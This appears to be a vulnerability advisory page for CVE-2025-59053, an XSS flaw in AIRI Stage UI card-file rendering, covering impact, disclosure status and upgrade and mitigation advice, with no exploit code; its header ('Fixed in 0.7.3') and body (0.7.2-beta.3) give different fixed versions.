Platform
javascript
Component
stage-ui
Fixed in
0.7.3
CVE-2025-59053 describes a critical cross-site scripting (XSS) vulnerability discovered in the AIRI Stage UI component. This flaw allows attackers to inject malicious HTML and JavaScript code into card files, which are then processed and rendered directly in the user's browser, potentially leading to account takeover or data theft. The vulnerability affects versions 0.7.2-beta.2 and earlier, and a patch is available in version 0.7.2-beta.3.
An attacker can exploit this XSS vulnerability by crafting a malicious card file containing JavaScript or HTML payloads. When a user processes this card file through the AIRI Stage UI, the injected code will be executed within the user's browser context. This can lead to a variety of attacks, including session hijacking, credential theft, redirection to phishing sites, and defacement of the user interface. The impact is particularly severe as the vulnerability allows for arbitrary client-side code execution, granting the attacker a high degree of control over the affected user's session. This vulnerability shares similarities with other XSS vulnerabilities where unsanitized user input is directly rendered into the DOM.
CVE-2025-59053 was publicly disclosed on 2025-09-11. No known active exploitation campaigns have been reported at the time of writing. There are currently no public proof-of-concept exploits available, but the vulnerability's nature makes it likely that such exploits will emerge. It is not listed on the CISA KEV catalog.
Exploit Status
EPSS
0.04% (11% percentile)
CISA SSVC
CVSS Vector
The primary mitigation for CVE-2025-59053 is to immediately upgrade to version 0.7.2-beta.3 or later, which contains the fix for this vulnerability. If upgrading is not immediately feasible, consider implementing input validation and output sanitization on the Markdown content before rendering it in the UI. While not a complete solution, this can help reduce the attack surface. Additionally, implement a Web Application Firewall (WAF) with rules to detect and block requests containing suspicious HTML or JavaScript payloads. Regularly scan your AIRI Stage UI deployment for vulnerabilities using automated security tools.
Update AIRI to version 0.7.2-beta.3 or later. This version fixes the XSS vulnerability and the possibility of remote code execution. The update mitigates the risk of an attacker executing malicious code on your system.
Vulnerability analysis and critical alerts directly to your inbox.
CVE-2025-59053 is a critical XSS vulnerability in AIRI Stage UI versions 0.7.2-beta.2 and prior, allowing attackers to inject malicious code via card files.
You are affected if you are running AIRI Stage UI version 0.7.2-beta.2 or earlier and process card files from untrusted sources.
Upgrade to version 0.7.2-beta.3 or later to resolve the vulnerability. Consider input validation and WAF rules as temporary mitigations.
No active exploitation campaigns have been reported, but the vulnerability's nature makes exploitation likely.
Refer to the official AIRI project documentation and security advisories for the latest information.
Upload your dependency file and we'll tell you instantly if this and other CVEs hit you.